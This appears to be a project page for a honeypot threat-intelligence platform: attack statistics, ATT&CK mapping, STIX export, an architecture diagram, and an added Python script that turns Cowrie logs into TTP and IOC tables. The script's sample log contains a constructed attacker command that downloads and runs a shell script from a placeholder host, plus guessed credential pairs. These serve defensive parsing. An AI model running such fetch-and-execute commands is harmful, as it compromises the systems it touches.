T-Pot 23.x · STIX 2.1 · MITRE ATT&CK · ELK Stack

Deception-Based Threat Intelligence Platform

30-day live honeypot deployment capturing real-world attacker TTPs, producing structured STIX 2.1 threat intelligence feeds and MITRE ATT&CK-mapped findings.

500k+ Attack Events · 12.5k+ Unique IPs · 8k+ IOCs Extracted · 9 TTPs Mapped · 30 Days Live

Live Attack Telemetry
100% real-world data — no simulations, no synthetic logs. Every event captured from unsolicited inbound connections to the live honeypot.
500k+ Total Attack Events (across all sensors)
12,500+ Unique Attacker IPs (from 40+ countries)
45,000+ Credential Attempts (unique user/pass combos)
150+ Malware Samples (unique captured payloads)
8,000+ IOCs Extracted (IPs · Hashes · Domains)
02–06 UTC Peak Attack Window (automated bots)

Top Targeted Ports (chart): by total attack event volume
Attack Activity by Hour, UTC (chart): average events per hour over 30 days
Top Attacker Countries (chart): total attack events by origin country

TTP Mapping
All observed techniques ranked by frequency. Mapped to MITRE ATT&CK and exported as STIX 2.1 attack-pattern objects.
Technique ID | Name | Tactic | Severity | Event Count | Frequency
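As an added example (not the project's own pipeline code), the Python below shows the shape of the Cowrie-to-ATT&CK step behind this table: it parses newline-delimited Cowrie JSON, counts events per technique, ranks them by frequency, and pulls the source IPs, payload hashes, URLs and credential pairs that feed the IOC totals and the hour-of-day chart. The sample events are constructed (real Cowrie field names, made-up values), and the eventid-to-technique table is an illustrative assumption; the page does not list which nine techniques it mapped.

```python
"""Added example, not the project's own pipeline: Cowrie JSON -> ATT&CK-ranked
TTP table plus IOC and hour-of-day extraction. Sample events are constructed;
the eventid-to-technique table is an illustrative assumption."""
import json
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed Cowrie-style events (genuine Cowrie field names, made-up values).
# The last line simulates a truncated write, which a live log tail will contain.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","timestamp":"2024-01-01T02:10:01.000000Z","session":"a1","sensor":"cowrie"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"root","password":"123456","timestamp":"2024-01-01T02:10:02.000000Z","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"root","password":"admin","timestamp":"2024-01-01T02:10:03.000000Z","session":"a1"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.7","username":"root","password":"password","timestamp":"2024-01-01T02:10:04.000000Z","session":"a1"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","input":"cd /tmp; wget http://203.0.113.5/x.sh; sh x.sh","timestamp":"2024-01-01T02:10:05.000000Z","session":"a1"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.7","url":"http://203.0.113.5/x.sh","shasum":"abababababababababababababababababababababababababababababababab","timestamp":"2024-01-01T02:10:06.000000Z","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.44","username":"admin","password":"admin","timestamp":"2024-01-01T03:00:00.000000Z","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.44","usern
"""

# Assumed mapping: Cowrie eventid -> (ATT&CK technique ID, name, tactic).
ATTACK_MAP = {
    "cowrie.login.failed": ("T1110.001", "Brute Force: Password Guessing", "Credential Access"),
    "cowrie.login.success": ("T1078", "Valid Accounts", "Initial Access"),
    "cowrie.command.input": ("T1059.004", "Command and Scripting Interpreter: Unix Shell", "Execution"),
    "cowrie.session.file_download": ("T1105", "Ingress Tool Transfer", "Command and Control"),
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")  # coarse: no octet range check
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def parse_events(raw):
    """One JSON object per line, as Cowrie writes cowrie.json; skip bad lines."""
    events = []
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # partial write or non-JSON noise must not stop the pipeline
    return events


def rank_ttps(events):
    """Rows for the TTP table: technique, tactic, event count, share of mapped events."""
    counts = Counter()
    for ev in events:
        hit = ATTACK_MAP.get(ev.get("eventid"))
        if hit:
            counts[hit] += 1
    total = sum(counts.values())
    if total == 0:
        return []
    return [{"technique_id": tid, "name": name, "tactic": tactic, "count": n,
             "frequency_pct": round(100.0 * n / total, 1)}
            for (tid, name, tactic), n in counts.most_common()]


def extract_iocs(events):
    """Source IPs, download URLs and their hosts, SHA-256 hashes, credential pairs."""
    iocs = {"ips": set(), "urls": set(), "sha256": set(), "credentials": set()}
    for ev in events:
        if ev.get("src_ip"):
            iocs["ips"].add(ev["src_ip"])
        if ev.get("url"):
            iocs["urls"].add(ev["url"])
            host = urlparse(ev["url"]).hostname
            if host and IPV4_RE.fullmatch(host):
                iocs["ips"].add(host)  # payload host is an IOC in its own right
        if ev.get("shasum") and SHA256_RE.match(ev["shasum"]):
            iocs["sha256"].add(ev["shasum"])
        if ev.get("eventid") == "cowrie.command.input":
            iocs["ips"].update(IPV4_RE.findall(ev.get("input", "")))
        if ev.get("eventid") in ("cowrie.login.failed", "cowrie.login.success"):
            iocs["credentials"].add((ev.get("username", ""), ev.get("password", "")))
    return iocs


def hourly_histogram(events):
    """Events per UTC hour-of-day, from the ISO 8601 timestamp Cowrie emits."""
    hours = Counter()
    for ev in events:
        ts = ev.get("timestamp", "")
        if len(ts) >= 13 and ts[10] == "T":
            hours[int(ts[11:13])] += 1
    return hours


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for row in rank_ttps(evs):
        print(f"{row['technique_id']:<10} {row['name']:<48} {row['tactic']:<20} "
              f"{row['count']:>3} {row['frequency_pct']:>5}%")
    print(extract_iocs(evs))
    print("peak hour (UTC):", hourly_histogram(evs).most_common(1))
```

Only four eventids are mapped here; Cowrie emits many more (cowrie.client.version, cowrie.session.closed, and so on), and unmapped events are deliberately excluded from the frequency denominator so that session bookkeeping does not dilute the technique shares.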

Attack Origins
Top source countries ranked by total attack events. Enriched with Shodan, AbuseIPDB, and MaxMind GeoLite2 data.
Country Breakdown (chart): events by origin country
Attack Protocol Mix (chart): by honeypot sensor type

STIX 2.1 Output
Structured threat intelligence bundles generated daily. MISP-compatible export and TAXII 2.0 server for consumer integration.
Object types exported: indicator · attack-pattern · malware

Platform Architecture
Fully passive deception infrastructure — captures only inbound unsolicited connections. No outbound attacks ever launched.
┌── PUBLIC INTERNET (Threat Actors) ─────────────────────────────┐
│  Scanners · Botnets · Exploit Kits · Brute-Forcers             │
└──────────────────────┬─────────────────────────────────────────┘
                       │ Unsolicited inbound traffic only
              ┌────────▼────────┐
              │    T-Pot VM     │  Ubuntu 22.04 · Docker Orchestration
              │    Cowrie       │  SSH / Telnet traps
              │    Dionaea      │  SMB / FTP / HTTP · Malware collection
              │    Glastopf     │  HTTP Web App exploits
              │    Heralding    │  Multi-protocol credential logger
              └────────┬────────┘
                       │ JSON logs → Logstash → Elasticsearch
              ┌────────▼────────┐
              │    ELK Stack    │  Kibana Dashboards · 30-day retention
              └────────┬────────┘
                       │ Enrichment pipeline (Python)
           ┌───────────▼───────────┐
           │   Threat Enrichment   │  Shodan · AbuseIPDB · VirusTotal
           │   GeoIP · ASN · WHOIS │  MaxMind GeoLite2 · K-Means Clustering
           └───────────┬───────────┘
                       │ Structured output
            ┌──────────▼──────────┐
            │  STIX 2.1 TIP Feed  │  MISP Export · TAXII 2.0 Server
            │  MITRE ATT&CK Maps  │  Research PDF · IOC Reports
            └─────────────────────┘

Key Observations